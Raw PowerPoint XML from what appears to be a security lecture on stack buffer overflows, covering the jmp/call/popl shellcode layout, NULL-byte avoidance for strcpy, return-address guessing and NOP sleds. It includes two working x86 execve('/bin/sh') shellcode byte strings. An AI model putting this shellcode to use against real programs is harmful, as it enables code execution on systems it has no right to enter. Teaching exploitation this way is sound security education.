              <a:t>bytes</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1400" dirty="0">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>call   offset-to-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>popl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>           # 5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>bytes</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1400" dirty="0">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>goes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>here</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1400" dirty="0">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>empty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>			      # 4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>bytes</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1400" dirty="0">
              <a:latin typeface="Courier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08043" y="3734998"/>
            <a:ext cx="457200" cy="6286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jmp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8293893" y="3734998"/>
            <a:ext cx="514350" cy="6286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call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>popl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8808244" y="3734998"/>
            <a:ext cx="885825" cy="6286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“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>”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694069" y="3731494"/>
            <a:ext cx="885825" cy="6286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empty</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Elbow Connector 21"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="9131697" y="2058996"/>
            <a:ext cx="4763" cy="3394869"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 9033339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7" idx="2"/>
            <a:endCxn id="18" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7993857" y="3806437"/>
            <a:ext cx="9525" cy="1114425"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 420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694069" y="3739761"/>
            <a:ext cx="885825" cy="6286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address of “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Elbow Connector 26"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="18" idx="0"/>
            <a:endCxn id="10" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1" flipV="1">
            <a:off x="8262938" y="3451629"/>
            <a:ext cx="4763" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -5298709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C7B73C33-DDA3-B349-AEE0-5FC1BEF26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Shell Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="164313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52800" y="4199320"/>
            <a:ext cx="50863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Another issue:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> stops when it hits a NULL byte</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="2182506"/>
            <a:ext cx="86868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Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[] =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	"\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>\x80"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	"\xb8\x01\x00\x00\x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>xbb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>\x00\x00\x00\x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>\x80\xe8\xd1\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	"\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>xec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>\x5d\xc3";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52800" y="5113720"/>
            <a:ext cx="5486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Solution:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>Alternative machine code that avoids NULLs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E82A3-9D26-6440-98E5-E922FEE80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Shell Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="385725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FA07C-4CE5-F245-940B-24D83FE35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78467B-C45F-014E-99AA-6EC184CBBC20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="2182506"/>
            <a:ext cx="868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Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[] =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	"\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>\x80\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>\x89\xd8\x40\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	"\x80\xe8\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>xdc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2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103833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643" y="3576186"/>
            <a:ext cx="5760642" cy="26962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776764" y="3429000"/>
            <a:ext cx="2753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we know what to set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Bad EIP) to?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2125B2-C616-9940-ABF1-BCE0C701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Crude Way to Get Stack Pointer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37570A-C2B2-8340-855A-B76DC1B2E922}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4627164" y="2347461"/>
            <a:ext cx="628650" cy="6286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more code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C4B44B-266D-AE4D-81FA-D1C05E533ACD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7536258" y="2347461"/>
            <a:ext cx="481012" cy="6286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ptr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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126998-A51D-EE4C-90C2-441A36923C83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4169964" y="2342698"/>
            <a:ext cx="457200" cy="6286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jmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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BD09BA-FE34-214C-9700-EA39F687C090}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5255814" y="2342698"/>
            <a:ext cx="514350" cy="6286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call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>popl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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32DBCE-8446-3449-B7C8-0525210E4544}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5770165" y="2342698"/>
            <a:ext cx="885825" cy="6286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“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>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FF8067-DA5D-924A-A012-4AC25A86C1E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6655990" y="2339194"/>
            <a:ext cx="885825" cy="6286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empty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B23B00D0-79D8-AF4A-A336-3692873245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93618" y="666696"/>
            <a:ext cx="4763" cy="3394869"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 9033339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527745E1-F18F-C149-9299-4BBFF9BAA699}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="23" idx="2"/>
            <a:endCxn id="24" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4955778" y="2414137"/>
            <a:ext cx="9525" cy="1114425"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 420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825827D-3104-A343-BB99-AF13B7A31600}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6655990" y="2347461"/>
            <a:ext cx="885825" cy="6286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address of “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>”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FF1FF6E4-29B7-9F4C-9A1D-3B2DF8391764}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="24" idx="0"/>
            <a:endCxn id="20" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1" flipV="1">
            <a:off x="5224859" y="2059329"/>
            <a:ext cx="4763" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -5298709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983FCB9-507E-4D46-84AD-C6303C85E2E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7658595" y="2834415"/>
            <a:ext cx="338400" cy="480960"/>
            <a:chOff x="7658595" y="2834415"/>
            <a:chExt cx="338400" cy="48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0468C8F-9156-E84C-B57B-22D20E683EAF}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7658595" y="2834415"/>
                <a:ext cx="338400" cy="480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0468C8F-9156-E84C-B57B-22D20E683EA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40595" y="2816775"/>
                  <a:ext cx="37404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768F4D0-3DEE-AF4F-A3A6-E3D9C20A87FC}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7748955" y="2862495"/>
                <a:ext cx="243360" cy="70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768F4D0-3DEE-AF4F-A3A6-E3D9C20A87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30955" y="2844495"/>
                  <a:ext cx="279000" cy="105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2429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24225" y="2691545"/>
            <a:ext cx="628650" cy="6286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more code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81700" y="2686782"/>
            <a:ext cx="514350" cy="6286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ptr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2867025" y="2686782"/>
            <a:ext cx="457200" cy="6286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jmp</a:t>
            </a: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3952875" y="2686782"/>
            <a:ext cx="514350" cy="6286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call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>popl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4295775" y="2686782"/>
            <a:ext cx="885824" cy="6286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“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>”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95876" y="2683278"/>
            <a:ext cx="885825" cy="6286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empty</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Elbow Connector 15"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="0"/>
            <a:endCxn id="22" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1" flipV="1">
            <a:off x="4236419" y="689088"/>
            <a:ext cx="4763" cy="4000153"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -10499286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cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3652839" y="2809881"/>
            <a:ext cx="9525" cy="1114425"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 330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095876" y="2686782"/>
            <a:ext cx="885825" cy="6286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address of “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Elbow Connector 18"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="0"/>
            <a:endCxn id="10" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1" flipV="1">
            <a:off x="3921920" y="2403414"/>
            <a:ext cx="4763" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -7764854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80458" y="3831197"/>
            <a:ext cx="523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use a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sled </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to make the arithmetic easier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581151" y="2691545"/>
            <a:ext cx="1315145" cy="6286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NOPs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81152" y="4288397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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xchg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” which has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>opcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> \x90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81150" y="4733929"/>
            <a:ext cx="485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Land anywhere in NOPs, and we are good to go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A5245D-336D-0E4C-A0F8-D461FC07FB4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6496050" y="2676529"/>
            <a:ext cx="514350" cy="6286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ptr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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9CBA0F-C7E7-BD46-9739-0CF61D9E47ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7010400" y="2676529"/>
            <a:ext cx="514350" cy="6286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ptr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48248F-6E29-C043-BAE5-43C419AF6D70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1581152" y="5431397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also add lots of copies of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> at 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FF0FA-65C4-6747-B55A-634D66E4C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NOP Sled</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="How to Make a Sled Go Faster, According to Science | Mental Floss">
            <a:extLst>
